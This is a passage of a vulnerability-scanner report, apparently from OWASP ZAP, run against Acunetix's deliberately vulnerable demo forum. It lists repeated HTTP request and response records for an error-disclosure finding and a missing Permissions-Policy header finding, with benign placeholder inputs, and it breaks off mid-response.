Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| Instances | 48 |
| Solution |
Disable debugging messages before pushing to production.
|
| Reference | |
| Tags |
OWASP_2021_A01
WSTG-v42-ERRH-01 OWASP_2017_A03 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10023 |
|
Low |
Permissions Policy Header Not Set |
|---|---|
| Description |
Permissions Policy Header is an added layer of security that helps to restrict from unauthorized access or usage of browser/client features by web resources. This policy ensures the user privacy by limiting or specifying the features of the browsers can be used by the web resources. Permissions Policy provides a set of standard HTTP headers that allow website owners to limit which features of browsers can be used by the page such as camera, microphone, location, full screen etc.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 